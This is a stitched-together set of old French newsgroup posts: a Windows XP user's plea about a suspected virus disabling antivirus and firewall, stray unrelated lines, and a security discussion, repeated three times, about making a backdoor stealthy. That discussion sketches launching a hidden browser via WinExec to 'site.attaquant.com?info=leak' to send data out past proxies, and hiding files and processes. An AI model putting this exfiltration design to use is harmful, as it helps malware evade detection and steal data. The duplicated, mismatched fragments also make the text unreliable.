Bonsoir ,
Depuis jourd hui j'ai un gros soucis avec mon explorer,mon antivirus, et mon
firewall.
-mon IE 6 s arrete souvent quand je surfe (la fenetre disparait)
-g eu beau desinstaller et reinstaller mon antivir et mon firewall, ils n
apparaissent plus au demarrage de windows ,et mme en les demarrant
manuellement des que j reduis leurs fenetres ils se ferment .
-quand je met mon anti virus en route ,il fait comme explorer ,la fenetre de
defilement disparait apres qques secondes.
windows xp pro
g testé le firewall netdefense de systemsuite 4.0,son antivirus associé (que
je c plus mettre a jour)
et g mme testé (apres avoir desinstallé systemsuite) Zone Alarm Pro 4.0 avec
l antivirus AVG 6.0 derniere mouture
meme symptomes
resultat :
ben je pense avoir un virus mais g aucun moyen de le verifier car les
antivirus online deconnectent a cause d IE6 defectueux, et mes propres
antivirus font pareils.
je suis ouvert à toutes vos idées ,sauf le formatage ;)
Je n'ai pas entendu parler de rapport, seulement d'une ordonnance.
-- Olivier Aichelbaum
Roland Garcia
Effet mirroir : vous, vous avez été consultant pour Alphasys le distributeur KAV, vous avez dit que leur concurent Tegam allait couler (fausse nouvelle)
Effet mirroir : vous, vous avez été consultant pour Alphasys le
distributeur KAV, vous avez dit que leur concurent Tegam allait
couler (fausse nouvelle)
Effet mirroir : vous, vous avez été consultant pour Alphasys le distributeur KAV, vous avez dit que leur concurent Tegam allait couler (fausse nouvelle)
Ben justement, ils semblent avoir envisagé la technique consistant à faire du malware un "compagnon" du navigateur (plugin ou ActiveX) mais il s ne semblent pas avoir suivi le raisonnement jusqu'au bout. Ceci leur aurait permis de se rendre compte que le mot de passe du proxy était connu du navigateur, et qu'ils n'avaient qu'à lui (le browser) demander pour l'obtenir ...
C'est juste mentionne' dans l'article : tandis qu'ils semblent avoir ecrit des PoC pour les autres techniques, ils n'ont pas approfondi celle-la. Il y a aussi selon moi une autre difference entre plugins, ActiveX et ta technique qui, du point de vue de la furtivite', a une certaine importance. Le browser/client de mail/whatever "connait" ses plugins ou les ActiveX qu'il est succeptible d'utiliser. C'est ce qui permet a des applcations comme Spybot S&D de lister facilement ce type d'add-on. Ca n'est pas tres furtif. Dans ta methode, l'application servant de mandataire ne fait que repondre a une requete d'une application cliente. En un sens, ca me parait plus furtif.
Tu me diras peut-etre qu'il est toujours possible d'enregistrer un ActiveX le temps d'effectuer les operations necessaires et de le de-enregister apres, mais je prefere quand-meme ta technique (BHOs et ActiveX etant utilises par pas mal de spywares, ils sont devenus suspects), ses seuls inconvenients etant qu'elle repose sur l'utilisation d'IE (condition generalement satisfaite*) et, plus delicat, la non prise en charge du demarrage au boot. Reste aussi, je suppose, a dissimuler les fichiers sur le disque et dans la liste des taches, Et bien-sur, ca regle tous les problemes de proxies.
*Quoique, je persiste, on pourrait aussi (je sais, j'ai qu'a le faire): - Recuperer par exemple l'application pointee par HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts.html - Faire en sorte que la backdoor lance celle-ci via un bete WinExec(application http://site.attaquant.com?info=leak,SW_HIDE) ; - Recup la reponse par exemple dans le titre de la fenetre corresp. via un EnumWindows.
-- Tweakie
On Mon, 17 Nov 2003, Nicob wrote:
Ben justement, ils semblent avoir envisagé la technique consistant à
faire du malware un "compagnon" du navigateur (plugin ou ActiveX) mais il s
ne semblent pas avoir suivi le raisonnement jusqu'au bout. Ceci leur
aurait permis de se rendre compte que le mot de passe du proxy était
connu du navigateur, et qu'ils n'avaient qu'à lui (le browser) demander
pour l'obtenir ...
C'est juste mentionne' dans l'article : tandis qu'ils semblent avoir
ecrit des PoC pour les autres techniques, ils n'ont pas approfondi
celle-la. Il y a aussi selon moi une autre difference entre plugins,
ActiveX et ta technique qui, du point de vue de la furtivite', a
une certaine importance. Le browser/client de mail/whatever "connait"
ses plugins ou les ActiveX qu'il est succeptible d'utiliser. C'est
ce qui permet a des applcations comme Spybot S&D de lister facilement
ce type d'add-on. Ca n'est pas tres furtif. Dans ta methode, l'application
servant de mandataire ne fait que repondre a une requete d'une application
cliente. En un sens, ca me parait plus furtif.
Tu me diras peut-etre qu'il est toujours possible d'enregistrer un
ActiveX le temps d'effectuer les operations necessaires et de le
de-enregister apres, mais je prefere quand-meme ta technique (BHOs
et ActiveX etant utilises par pas mal de spywares, ils sont devenus
suspects), ses seuls inconvenients etant qu'elle repose sur l'utilisation
d'IE (condition generalement satisfaite*) et, plus delicat, la non prise
en charge du demarrage au boot. Reste aussi, je suppose, a dissimuler
les fichiers sur le disque et dans la liste des taches, Et bien-sur, ca
regle tous les problemes de proxies.
*Quoique, je persiste, on pourrait aussi (je sais, j'ai qu'a le
faire):
- Recuperer par exemple l'application pointee par
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts.html
- Faire en sorte que la backdoor lance celle-ci via un bete
WinExec(application http://site.attaquant.com?info=leak,SW_HIDE) ;
- Recup la reponse par exemple dans le titre de la fenetre corresp.
via un EnumWindows.
Ben justement, ils semblent avoir envisagé la technique consistant à faire du malware un "compagnon" du navigateur (plugin ou ActiveX) mais il s ne semblent pas avoir suivi le raisonnement jusqu'au bout. Ceci leur aurait permis de se rendre compte que le mot de passe du proxy était connu du navigateur, et qu'ils n'avaient qu'à lui (le browser) demander pour l'obtenir ...
C'est juste mentionne' dans l'article : tandis qu'ils semblent avoir ecrit des PoC pour les autres techniques, ils n'ont pas approfondi celle-la. Il y a aussi selon moi une autre difference entre plugins, ActiveX et ta technique qui, du point de vue de la furtivite', a une certaine importance. Le browser/client de mail/whatever "connait" ses plugins ou les ActiveX qu'il est succeptible d'utiliser. C'est ce qui permet a des applcations comme Spybot S&D de lister facilement ce type d'add-on. Ca n'est pas tres furtif. Dans ta methode, l'application servant de mandataire ne fait que repondre a une requete d'une application cliente. En un sens, ca me parait plus furtif.
Tu me diras peut-etre qu'il est toujours possible d'enregistrer un ActiveX le temps d'effectuer les operations necessaires et de le de-enregister apres, mais je prefere quand-meme ta technique (BHOs et ActiveX etant utilises par pas mal de spywares, ils sont devenus suspects), ses seuls inconvenients etant qu'elle repose sur l'utilisation d'IE (condition generalement satisfaite*) et, plus delicat, la non prise en charge du demarrage au boot. Reste aussi, je suppose, a dissimuler les fichiers sur le disque et dans la liste des taches, Et bien-sur, ca regle tous les problemes de proxies.
*Quoique, je persiste, on pourrait aussi (je sais, j'ai qu'a le faire): - Recuperer par exemple l'application pointee par HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts.html - Faire en sorte que la backdoor lance celle-ci via un bete WinExec(application http://site.attaquant.com?info=leak,SW_HIDE) ; - Recup la reponse par exemple dans le titre de la fenetre corresp. via un EnumWindows.